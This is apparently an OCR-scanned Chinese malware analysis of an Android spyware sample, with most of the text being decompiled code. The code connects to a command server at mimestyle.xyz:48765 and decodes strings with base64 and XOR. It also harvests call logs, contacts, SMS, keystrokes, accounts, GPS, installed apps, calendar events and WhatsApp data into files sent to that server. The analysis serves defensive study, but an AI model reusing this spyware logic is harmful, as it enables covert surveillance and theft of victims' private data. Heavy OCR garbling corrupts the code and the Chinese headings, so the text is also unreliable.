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2) apkfXA%EEHY , RRIRARASFFARMUEMIRIALLIE | TATARASIS RS T IRIBLLIE
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d

evernote.android.job
google

system.myapplication

String vl2 = "resoclwve host";
String w13 = "failed to connect";
String w14 = "Skip:";
String wl3 = "rcount";
long w16 = 120000;
try {

vi.p.b{);

}

deteat.s.getInt (vl3, 5);

dcteat.a = decteat.e.getString(vll, "1.2"};

v7.1l = Integer.valueCf (dcteat.s.getInt {"pobusk", 48765));
vl = new StringBuilder();

vl.append (dcteat.a);

v1l.append(vl0);

vl.append(String.valuelf (vT.1));

vl.toString(};

deteat.a = v7.p.a("PykaVARDORA 3bglICQ=—", "REwlswlir"}; |

vi.l = c.d.a.a.a;

v4 = new Scocket{Inethddress.getByName (doteat.a), v7.1.intValue(});
v4.3etSoTimeout (120000} ;

v3 = new DatalnputStream(vd.getInputStream());

vl 1 = new DataCutputStream(v4.getOutputStream());

catch (Exception w0} {

vlE = vE;
v2d = vi;
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3) EHKC2 , BAIRMRAFH AN C2{EEMEMALIE , MAAARAXC2M T % , MEARA
base64+XOR key

public String a{String arg&, String arg7) {
int vl = 0;

byte[] w6 = Basetod.decode {arge, 0);

byte[] 7 = argT.getBytes();

byte[] v2 = new byte([v6.Isngth];

while (vl < v&.length) {
v2[vl] = {(byte) (ve[vl] ~ vT[vl % v7.l=ngth]});
++vl;

}

return new String(vZ);

4) Cf#3ReRE
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5) i fAHIC2 : mimestyle.xyz:48765

try {
vI.g = vT.e.zplit("/"};
if({v7.g.length '= 16) {

goto labkel 277;

}

vi.a(vl.g[0].trim(), "Call", dcteat.j.a);
vT.a{vT.g[1l].trim(}, "CT", dcteat.7j.b);
vT.a({vT.g[v23] .trim(), "sSM3", dcteat.7j.c);
vT.a{vl.g[v22] .trim{), "Key", dcteat.j.d);
vT.a{vT.g[ve].trim(), "Tree", dcteat.j.e);
vi.a({vT.g[5] .trim(), "RC", decteat.7.f);
vi.a({vl.g[6] .trim(), "MNet", decteat.7j.g);
vi.a({vl.g[7] .trim(), "CR", dcteat.7j.h};
vi.a({vl.g[8] .trim(), "LR", dcteat.7j.i};
vT.a{vT.g[9].trim()}, "F5", dcteat.7j.7j);
vT.a({vT.g[10].trim(), "GP", dcteat.7F.k);
vT.a{v7T.g[1ll].trim(), "PK", dcteat.j.I);
vT.a{vT.g[12].trim(), "BW", decteat.j.m);
vi.a(vT.g[13].trim(}, "CE", deteat.7j.n);
vi.a(vT.g[1l4].trim(}, "Wapp", docteat.j.o);

}

catch (Exception v0) {
goto label 137;

6) HXC2REIKTES , RIFHESHKIER LF , STIFHTELSMINEEMNT -
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54 TRk
Call  $REUBIFIZHTZ FCallLogs.txt k1%
CT  #REUEMRFETF Fcontacts.txt_E1%
SMS  HEUSR{SHF Asms.txt L%
Key  HREVBEMNEEHF Akeys.txt L%
Tree  FREXSDRXXMSIRIF ATree.txt_E1%
AC  #REUK P8 77 Raccounts. txt
Net  FREAMLKE BT Anetinfo.txt_E{%
CR  HmEUBEREFHFAClist.txt L%
LR ==
FS et
GP  REXGPS{EEHFAGP.ixt L%
PK U %17 Apkinfo.txt_E1{&
BW  HREUNYERMME S Abw.txt L%
CE  ¥EHHAM{EET Fce.txt b
Wapp #xERwhatsapp{s/ 217 A WappHolder.txt_t{%
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7)

try {

vl 2.af{vZ 3, v3 1, v4 3, v32 3, vo_1);

this.a("NE",
this.a({"cT",
this.a("Call"
thi=.a("SMs",
thi=s.a("Tres"
this.a({"GE",
thiz.a({"Key",
this.a("Live"
this.a("PK",
this.a("CE",
this.a("BW",
if(!decteat. r)

"netinfo.t=xt", w28, w27, dcteat.j.g);
"contacts.txt", v28, v27, dcteat.j.b);
, "CallLogs.t=xt", v2B, w27, dcteat.j.a);
"sms.txt", v2B, w27, decteat.j.c):

¢ "Tree.t=t", v2B, v2T, dcteat.j.s=);
"GP.txt", wv2B, w27, dcteat.j.k);
"keys.txt", v2B, v27, dcteat.j.d);

¢, "Live.tzt", w28, +27, dcteat.j.h);
"pkinfo.txt", w28, v27, dcteat.j.I);
"oe.txt", v2B, v27, dcteat.j.m);
"bw.txt", v2B, v27, dcteat.j.n);

{

goto label 430;

EETES RARKT

catch (Exception w1} {

B3

this.a.getContentResolver().query(CalllogSCalls. CONTENT URI, null, null,

try {
vl.getMessage ();
label 23:
if (dcteat.=s.getInt(v0, 1} !'= 1} {
return;
H
Curscr vl 3 =
mall, null);
this.b = vl 3.getColumnIndex ("number");
this.c = vl 3.getColumnIndex("type");
this.d = vl _3.getColumnIndex("date");
this.e = vl 3.getColumnIndex("duration");

v3 = new FileCutputStream{mew File (dcteat.e,

this.k = new
while (true) {

label 53:
if(!vl 3.
goto

H
this.f =
thi=.
this.
this.g =
v4 = new

b b by

v5 =
qgoto
}

JSCHATrrav();

moveToNext () ) {
label 10&;

vl 3.getString(this.b);
vl 3.getString(this.es);
vl 3.getString(this.d);

"CalllLogs.txt")});

Integer.parselnt (vl 3.getString(this.c));
Date (Long.valueCf (this. h) .longValue () ) ;
if (this.g == 1) {

"TNCOMING ";
label B85;

else if(this.g = 3} {

va =
goto
}

"Miz=zed ";
label B85;

else if(this.g == 2} {

w5 =
label B83:

this.
H

hreak:

"OutGoing ";

J = w¥3;
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8) IREUBVEICRARRARS

String w8 = "SMS";

String w9 = "Sent";

String w10 = "Unknown";

String wll = "Inbox";

String vl2 = "android.provider.Telephony.SMS SENT";
String vl3 = "android.provider.Telephony.SMS RECEIVED";
String vl4 = "date";

String vl5 = "hody";
Ckiject wle = w3;

String v3 1 = "address";
String w1 1 = "type";

if (w7 !'= w0 2) {

=T

goto lakel &7;

}
try {
ContentValues v0 3 = new ContentValues();
v0 3.put(v3 1, vi4[v2].getOriginatinghddress(}};
w0 3.put(vls, vi[vZ].getMessageBody().toString());
w0 3.put(vl4, vb.format(new Date(}));
if (arg2l.gethAction() .compareTolgnoreCase (v13) =— 0) {
v0 3.put(vl 1, +1l);
i
else {
goto label 54;
}
label &0:
decteat.g.d.insert (vE8, mull, +0_3);
goto label £4;
label 54:

ifﬂargzl.gethﬂtinnﬂ}.cnmpareTnIgnnIeCaseﬂle} == 0} {
v0 3.put(vl 1, +3);
goto label &0;

9) REAE(EHERAR
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public void a{} {

Bocount[] w3;

String w1l = "ACfin;

deteat. f.putInt (vl, 1);

deteat. f.commit () ;

try {
w3 = RecountManager.get{this.z).gethccounts () ;
boolean v4 = dcteat.h;

H

catch (Exception v2) {
goto label &&;

}

String wvo "AT";
String we = "AC";
if ('wd) {

goto label 35;

try {
decteat.g.al{ve, a.a);
int v4_1;
for(vd_1 = 0; true; ++vd 1) {
if(v4 1 > v3.length - 1) {
goto label 70;

}

ContentValue=s v7 = new ContentValue=();
vT.put{ve, v3[vd_1].name};

vi.put(vd, v3[vd_1].type);
deteat.g.d.insert (ve, null, v7);

label 35:
this.b = new JSCHArrav();
FileCutputStream v4 2 = new FileCutputStream{mew File{dcteat.c, "accounts.txzt"});
int v7_1;
for(v?_ 1 =0; v7_1 <= wv3.length - 1; ++v7_1) {

10) #RERIK 152
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if (argl0.contains ("CR")) |

try {
dcteat.n.clear();
FileCutputStream v0_1 = new FileCutputStream(new File (dcteat.g, "Clist.txt"});
label 84:
if (v2 «= this.h.Iength - 1) {
if (this.h[v2].trim().length(} > 0} {
this. h[v2] . trim();
w8 1 = new StringBuilder(};
w8 l.append(this.h[vZ].trim(});
v3 l.append{'\n');
w0 _l.write(String.valueCf(vd l.toString(}).getBytes(});
dcteat.n.add(this.h[v2] .trim());

}

++vi;
goto label EB4;

}

w0 1.close();
return 1;

}

catch(Exception v8 2} {
dcteat.n.clear();
w0 2 = new StringBuilder(};
goto label 120;

1) REFEEEARANE

public wveid a()} {
decteat.s.getInt ("PEEL", 0);
try |
FackageManager w0 _1 = this.a.getPackageManager();
List vl = w0 1.getInstalledApplications{128);
if (dcteat.h) {
return;

this.b = new JSCHErrayv();
FileOutputStream v2 = new FileOutputStream({mew File (dcteat.e, "pkinfo.txt"));
Iterator vl 1 = wl.iterator{);
while (vl 1.hasNext()) {
Chiect w3 = vl_l.next(};
J50NCkject w4 = mew JSONChject();
vd.put ("EN", ({EpplicaticnInfo)w3d).packageName);
vd.put ("AN", w0 l.gethpplicationlabel (({(ZpplicationInfo)w3)));
thi=.b.put(vd);

v2.write(thi=s.b.toString() .getBytes());
this.b = new JSCHErrayv();
vZ.closel();

}

catch (Exception w0} {
StringBuilder vl 2 = a.a("Error = ");
vl 2.append(v0.getMessage());
vl 2.toString();

}
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12) I RIS EAR KA

w4 = &;

if (arglld.contain=s ("LR"}} {

try {

this.p.F = this.h[6].split (" _");

¥v8 1 = new StringBuilder(};
.append (this.kh[6]);

w8 1
w8 1
vi 1
w0 1

if(this.p.F.I=sngth = v4) |

labe

this=s.
this.
this.
this.

dote

.append ("

.append (this.p. F. Isngth) ;

")

.toString();

thi=s.p.D
v 3 =0

4L LT

= wi;

if(v8 3 » this.p.F.length - 1) {

}

this.
this.
this=s.
this.
this.
this.
thi=s.
this.
this.
this.
this=s.
this.
this.
+t+this.
+v8 3;
goto lake

IR A

LR R LR

I
(=l =Ny=
e e e e

wow
Mo WW

et

a

13) FEWEMIAE

.al(this.

-

goto label 274;

= this.p.F[v3 3].split("="};

thi=.p.3[0].=plit(vl);
Integer.parselnt (this.p.v[0]};
Integer.parselnt (this.p.v[1]);
this.p.&[1].35plit(v0);

= Integer.parselnt(this.p.v[0]);

= w3 3;

.O.a.get (vl 3).
.a.get(vd 3}).
.a.get(vi 3).
.a.get(vd 3).
. D;

- - q e
4 L3y

=)

= Integer.

Integer.
Integer.
Integer.

Integer.parselnt (thi=.p.v[1]);

valueOf (this
valueOf (this
valueOf (this
valueOf (this

BV} ;
DX} ;
-B-¥)i
-p-2);
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public veid a{} {

Cursor vl 1;
int vl12;
int v11;
int v10;
int v&;
String w0 = "Error = ";
try {
this.b = new JSCHRrrav();

ContentResoclver w2 = this.a.getContentResolver();
Uri w3 = Uri.parze("content://com.android.calendar/events"});

String[] v4 = new String[6];

v8 = 0;

v4[0] = "ecalendar id";
v4[1l] = "title";

v1ld = 2;

v4[v1l0] = "description";
vll = 3;

v4[vll] = "dtstart";

vlz = 4;

vd[vlZ] = "dtend";

v4[5h] = "eventLocation";

vl 1 = v2.query(v3, v4, null, null, null);

if (vl l.getCount(} <= 0} {

return;
}
if{!vl 1.moveToFirst()) {
return;
}
label 35:

while(vE > vl l.getCount(} - 1) {
goto label 75;
}
}
catch (Exception wl) {
goto label E3;

}

try {
J50NATrray v2 2 = new JSCHATrTay();
J50NChbject v3 1 = mew J3CNChbject();
JS0NChbject v4 1 = mew JSCNChject();
v4 l.put("ne", vl l.getString(l));

vi l.put("=d", d.a(long.parselong(vl l.getString(vll)}}});
v4 l.put("ed", d.a(long.parselong(vl l.getString(vl2)}}});

14) FREXE H1TF2AE R A
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try {
SQLiteDatabase v3 2 = w3 1l.d;
StringBuilder v& 3 = mew StringBuilder();
v6_3.append("select * from Wapp where mdhid=\'");
ve 3.append(((String)wvd 1}};
ve 3.append(v0);
if(v2 2.rawQuery(vée 3.toString(), v7).getCount() <= 0) {
goto label 39;

}

ContentValues w5 3 = mew ContentValues();

w5 3.puk("Sent", "Yes");

SQLiteDatabase v 4 = dcocteat.g.d;

ve 4.update(vE, w3 3, "md5id=\'" + ({({string)wid 1)) + w0, v7);
goto label 35;

H
catch (Exception v2 2) {
try {
label &E:
vZi Z.getMessage();
goto label 39;
label 70:
if(vd.length({} <= 0) {
goto label 899;
}
vd.toString();
H
catch (Exception w0 1) {
goto label B3E;
}
}
try {
vl 2 = new FileCutputStream(new File (dcocteat.e, "WappHolder.txt"), true);
}

15) S5WhatsApp#d <AL
=. XKEHHr -
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this.tr = this.tem.split("/");
if (this.tr.length = 16) {

this.getfg(this. tz[0].trim(),

runto vl = this;

this.getfg(v0.

tr[l).trim(),

vl = this;

this.getfg(v0.

tz[2).trim(),

wl = this;

this.getfg(v0.

tr[3).txim(),

wl = this;

this.getfg(v0.

tr[d].trim(),

v0 = this;

this.getfg(v0.

tr[5].txim() .

vl = this;

this.getfg(v0.

tr[6].txim(),

vl = this;

this.getfg(v0.

tr[T).trim (),

w0 = this;

this.getfg(v0.

tr[8).trim(),

wl = this;

this.getfg(v0.

tr[9).trim(),

wl = this;

this.getfg(v0.

tr[10] .trim()

vl = this;

this.getfg(v0.

tr[ll1] .trim{()

vl = this;

this.gecfg(v0.

er[12] .trim()

v0 = this;

this.getfg(v0.

tr[13].trim()

w0 = this;

this.getfg(v0.

tr[14] . trim()

"Call",
"CT", ten.fg.ccleg);
"SMS", ten.fg.mlog);
"Hey", ten.fg.klog);
“"Tree", ten.fg.tlog);
"AC", ten.fg.wlog);
"Het", ten.fg.nleg);
"CR", ten.fg.crleg);
"LR", ten.fg.lrleg);
“F5", ten.fg.fsleg);
: "GE", ten.fg.gslog);
s "PK", ten.fg.pklog);
. "BW", ten.fg.csleg);

r "CE", ten.fg.bwleg);

; "Wapp", ten.fg.wvappleg);

try {

ten. £fg.cleg) ;

}

vT.g = vl.e.split("/");

if(v7.g.length '= 16) {
goto label 277;

}

vT.a(vl.g[0].trim(), "Call", dcteat.j.a);
vT7.a(v7l.g[1l].trim{), "CT", dcteat.j.b);
vT.a(vi.g[v23].trim(), "SMS", dcteat.j.c);
vT.a(vl.glv22] .trim(), "Key", dcteat.7j.d);
vT.a({vl.g[ve].trim(), "Tree", dcteat.j.e);
vT.a(vl.g[5] .trim(), "AC", dcteat.j.f);
wT.a(vl.g[6].trim(), "Net", decteat.j.g);
vT.a(vl.gl[7].trim(), "CR", dcteat.j.h);
vT.a(vl.g[8] .trim(), "LR", dcteat.j.i);
v7.a({v7.g[9] .trim(), "FS", dcteat.j.j);
vT.a(vl.g[1l0].trim(), "GP", dcteat.j.k);
vT.a(v7.g[1l]).trim(), "PK", decteat.j.l);
v7.a(v7.g[12] .trim(), "BW", dcteat.j.m);
vT.a(vl.g[13].trim(), "CE", dcteat.j.n);
vT.a(v7.g[14] .trim(), "Wapp", dcteat.j.o);

1) 58 Hidonot team RATH & AR , ITHIHESTE—Hf

while (this. sendf) ;

thi=.
this.

this
this

this

this

zendlogs ("Call"
zendlogs ("CT",

.zendlogs ("SMS",
.zendlogs ("Hey",
this=s.
this.

sendlogs ("Tree"
sendlogs ("RC",

.sendlogs ("NE",
this.
thi=s.

sendlogs ("GE",
zendlogs ("Live"

.zendlogs ("FK",
this.
this.
if{({ten.FappFileSend) &&
this.sendlogs ("Wapp",

zendlogs ("CE",
zendlogs ("BW",

. "CallLogs.t=xt", w3, w&, ten.fg.clog);
"contacts.txt", v3, w6, ten.fqg.cclog);

"sms.txt", v3, v&, ten.fg.mlog);
"keys.txt", v3, ve, ten.fg.klog);
; "Tree.tzt", v3, vo, ten.fg.tlog);
"accounts. txt", v3, ve,
v3, wb, ten.fg.nlog);

ve, ten.fg.gslog);
v3, vh, ten.fg.crlog);
v3, vh, ten.fg.pklog);

"netinfo.txt",
"GP.txt", v5,
, "Live.txt",
"pkinfo. txt",
"oe.txt", wh,
"hw.txt", v,

ve, ten.fg.celog);
ve, ten.fg.bwlog);
'ten.WappRunning) {

"WappHolder.txt", v3, v,

ten. fg.vilog);

ten. fg.vapplog) ;
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try {
vl 2.af{vZ 3, v3 1, v4 3, v32 3, vo_1);
this.a({"NE", "netinfo.txt", +28, v27, dcteat.j.g);
this.a({"CT", "contacts.t=xt", v28, +27, dcteat.j.b);
this.a({"Call", "Calllogs.txt", w28, v27, dcteat.j.a);
thi=z.a("sMS", "sms.txt", v28B, v27, dcteat.j.c);
this.a("Tree", "Tree.txt", v28, w27, dcteat.j.s);
thi=.a("GP", "GP.txt", w28, v27, dcteat.j.k);
thiz.a("Hey", "keys.t=zt", v2B, v27, dcteat.j.d);
this.a{"Live", "Live.t=zt", v2B, 27, dcteat.j.h);
this.a({"PK", "pkinfo.t=zt", v2B, v27, dcteat.j.I);
this.a({"CE", "ce.txt", w28, v27, dcteat.j.m);
this.a("BW", "bw.t=xt", w28, +27, dcteat.j.n);
if (! dcteat r} {

goto label 430;

) RARNIESEMNIAHE AR, ATRAHANR—RAT,
M, R&EW
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